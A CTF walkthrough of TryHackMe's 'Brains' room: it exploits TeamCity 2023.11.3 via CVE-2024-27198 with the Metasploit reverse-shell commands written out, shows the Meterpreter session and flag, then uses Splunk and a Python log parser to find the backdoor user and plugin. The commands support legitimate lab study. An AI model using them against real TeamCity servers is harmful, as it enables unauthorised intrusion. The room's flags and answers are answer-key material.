Brains — TryHackMe Walkthrough
This post describes a penetration-testing and defensive-analysis exercise against TeamCity 2023.11.3. After exploiting CVE-2024-27198 to obtain a Meterpreter session and extract the user flag, Splunk is used to analyse the logs and find the backdoor user eviluser created by the attacker and the malicious plugin YAgxHifR that was uploaded. 2025-9-28 07:25:55 Author: infosecwriteups.com

Task 1 Red: Exploit the Server!

Reconnaissance

I started with an aggressive Nmap scan to enumerate services and versions (-A already implies version detection and default scripts, so -sV -sC are redundant here but harmless):

nmap -sV -sC -A <ip>

Important findings from the scan:

  • 22/tcp — ssh — OpenSSH 8.2p1 (Ubuntu)
  • 80/tcp — http — Apache/2.4.41 (Ubuntu); page title: Maintenance
  • 50000/tcp — http — returned the TeamCity maintenance HTML and TeamCity headers (appears to be TeamCity)

Web enumeration

I navigated to the web server on port 80 first and saw a simple maintenance page. That didn’t reveal much immediately beyond the server header and that the site was intentionally showing maintenance.


Visiting 50000 revealed a TeamCity management interface with an accessible login/maintenance page.


Vulnerability reconnaissance

I confirmed that the TeamCity login page shows version 2023.11.3, which is affected by CVE‑2024‑27198, an authentication bypass that leads to unauthenticated remote code execution; JetBrains fixed it in 2023.11.4. Rapid7's analysis of the vulnerability matches what I found and documents the exploit details and remediation.


Exploitation

I launched Metasploit and used the TeamCity RCE module, configured a reverse handler, and ran the exploit:

msfconsole -q
use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198
set LHOST tun0
set LPORT 53
set RHOST <ip>
set RPORT 50000
run

Metasploit confirmed the target was vulnerable, used the authentication bypass to create an access token, uploaded a plugin carrying the payload (the module generates a random eight-character plugin name on every run), delivered the stage, and then deleted the plugin to clean up after itself. The module opened a meterpreter session:

[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9...
[*] Uploading plugin: YAgxHifR
[*] Sending stage (58073 bytes) to 10.201.28.176
[*] Deleting the plugin...
[+] Deleted /opt/teamcity/TeamCity/work/Catalina/localhost/ROOT/TC_147512_YAgxHifR
[+] Deleted /home/ubuntu/.BuildServer/system/caches/plugins.unpacked/YAgxHifR
[*] Meterpreter session 1 opened (10.17.30.120:53 -> 10.201.28.176:55558)

Important: I set LPORT to 53, so before running the module I had to stop whatever was already listening on port 53 on my attacking machine (for example systemd-resolved or named) to free the port. Binding a port below 1024 also requires root (or CAP_NET_BIND_SERVICE), so msfconsole has to run with that privilege; `ss -lntup 'sport = :53'` shows which process currently holds the port. Any free port the target can reach outbound works for the handler; 53 was simply my choice.

Capturing the user flag

After getting the meterpreter shell, I listed files and read the user flag:

meterpreter > cat flag.txt
THM{faa9bac345709b6620a6200b484c7594}

Task 2 Blue: Let’s Investigate

After exploiting the box I switched to the Blue/Forensics side of the lab to investigate what the attacker left behind.

  • I deployed the Splunk machine and waited a few minutes for the instance to come up.
  • Splunk URL: http://MACHINE_IP:8000
  • Credentials: Username: splunk, Password: analyst123
  • After logging in I landed on the Splunk Enterprise dashboard.


  • I navigated to Search & Reporting to start looking through collected logs.
  • From the Search app I opened Data Summary and filtered by source. I selected /var/log/auth.log to focus on authentication events.


  • The auth log is the right place to look for useradd events and other account activity.


  • To find account creation events I ran a simple search over the auth log:
source="/var/log/auth.log" useradd "new user"

Then I expanded the time picker from the default (last 24 hours) to All time so I wouldn’t miss older events.


The search returned a user creation entry showing the attacker created a backdoor account named eviluser.
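The Splunk search above is a keyword hunt. To show what a detection would actually extract from those events, here is an added example (my own code, not part of the original walkthrough or the room) that parses auth.log lines in the format written by shadow-utils' useradd and usermod, pulls out the new account's name, UID, GID, home, shell and the terminal it was created from where that field is present, and flags the account-creation patterns that matter after a compromise: a second UID 0 account, an interactive shell with a home directory outside /home, or membership in a privileged group. The log lines are constructed for the example; the hostname, PIDs and timestamps are invented.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample auth.log lines (not taken from the lab's Splunk instance).
# "new user:" / "new group:" is the wording useradd writes via syslog; the
# trailing "from=" field only appears on newer shadow-utils releases, so the
# parser treats it as optional.
SAMPLE_AUTH_LOG = """\
Jul 20 14:02:11 brains sshd[1402]: Accepted publickey for ubuntu from 10.0.0.5 port 50122 ssh2
Jul 20 14:05:37 brains useradd[2201]: new group: name=eviluser, GID=1001
Jul 20 14:05:37 brains useradd[2201]: new user: name=eviluser, UID=1001, GID=1001, home=/home/eviluser, shell=/bin/bash
Jul 20 14:05:52 brains usermod[2215]: add 'eviluser' to group 'sudo'
Jul 20 14:06:03 brains passwd[2220]: pam_unix(passwd:chauthtok): password changed for eviluser
Jul 20 14:07:10 brains useradd[2300]: new user: name=svc_backup, UID=0, GID=0, home=/var/tmp/.x, shell=/bin/sh, from=/dev/pts/1
"""

NEW_USER_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) useradd\[(?P<pid>\d+)\]: "
    r"new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+), GID=(?P<gid>\d+), "
    r"home=(?P<home>[^,]+), shell=(?P<shell>[^,\s]+)(?:, from=(?P<src>\S+))?"
)
GROUP_ADD_RE = re.compile(r"usermod\[\d+\]: add '(?P<name>[^']+)' to group '(?P<group>[^']+)'")

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
PRIVILEGED_GROUPS = {"sudo", "wheel", "admin", "docker"}


@dataclass
class NewUser:
    ts: str
    host: str
    name: str
    uid: int
    gid: int
    home: str
    shell: str
    source: Optional[str]            # terminal from the "from=" field, if logged
    groups_added: List[str] = field(default_factory=list)


def parse_new_users(log_text: str) -> List[NewUser]:
    """Collect every account created by useradd, then attach later usermod group additions."""
    users = {}
    for line in log_text.splitlines():
        m = NEW_USER_RE.match(line)
        if m:
            users[m["name"]] = NewUser(
                m["ts"], m["host"], m["name"], int(m["uid"]), int(m["gid"]),
                m["home"], m["shell"], m["src"],
            )
            continue
        g = GROUP_ADD_RE.search(line)
        if g and g["name"] in users:
            users[g["name"]].groups_added.append(g["group"])
    return list(users.values())


def suspicious_reasons(u: NewUser) -> List[str]:
    """Why a freshly created account deserves a closer look."""
    reasons = []
    if u.uid == 0:
        reasons.append("UID 0 (second root account)")
    if u.shell not in NOLOGIN_SHELLS and not u.home.startswith("/home/"):
        reasons.append(f"interactive shell with home outside /home ({u.home})")
    priv = PRIVILEGED_GROUPS & set(u.groups_added)
    if priv:
        reasons.append(f"added to privileged group(s): {sorted(priv)}")
    return reasons


if __name__ == "__main__":
    for u in parse_new_users(SAMPLE_AUTH_LOG):
        print(f"{u.ts} {u.host}: new user {u.name} (uid={u.uid}, shell={u.shell}, from={u.source})")
        for r in suspicious_reasons(u):
            print(f"    ! {r}")
```

On the sample input this reports eviluser (flagged because it was added to sudo shortly after creation) and the constructed svc_backup account (flagged for UID 0 and a hidden home under /var/tmp). The same fields are what a Splunk `rex` extraction over `source="/var/log/auth.log" "new user"` would give you; doing it in code makes the logic testable and lets you run it over an exported log when Splunk is not available.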


Question: What is the name of the backdoor user which was created on the server after exploitation?

Answer: eviluser

Plugin upload

To identify the plugin the attacker uploaded during exploitation I searched TeamCity activity logs in Splunk with:

source="/opt/teamcity/TeamCity/logs/teamcity-activities.log" *plugin*

I set the time range to All time and filtered on the host. The logs recorded the plugin upload and the actions that followed it, the same sequence the Metasploit output showed. Note that the plugin name in these logs is not the one from my own run (YAgxHifR): the module picks a random name each time it is executed, and the Splunk machine is a separate instance holding logs from a different attack, so the name you need is the one in the activities log, not the one from your session.


Question: What is the name of the plugin installed on the server after successful exploitation?

Answer: AyzzbuXY.zip


Conclusion

The Brains room on TryHackMe offered a complete journey from offensive exploitation to forensic analysis. I successfully exploited a vulnerable TeamCity 2023.11.3 instance (CVE‑2024‑27198) to gain a meterpreter shell, captured the user flag, and then shifted to Blue Team tasks to investigate the attacker's footprints. Using Splunk, I identified the backdoor user and the uploaded malicious plugin, gaining hands-on experience in post-exploitation analysis and log investigation.

This room is perfect for anyone looking to practice real-world web app exploits, RCE techniques, and forensic log analysis. Following this walkthrough, you should feel confident combining offensive and defensive skills to both compromise and analyze systems safely.


Source: https://infosecwriteups.com/brains-tryhackme-walkthrough-8be300aa8d87?source=rss----7b722bfd1b8d---4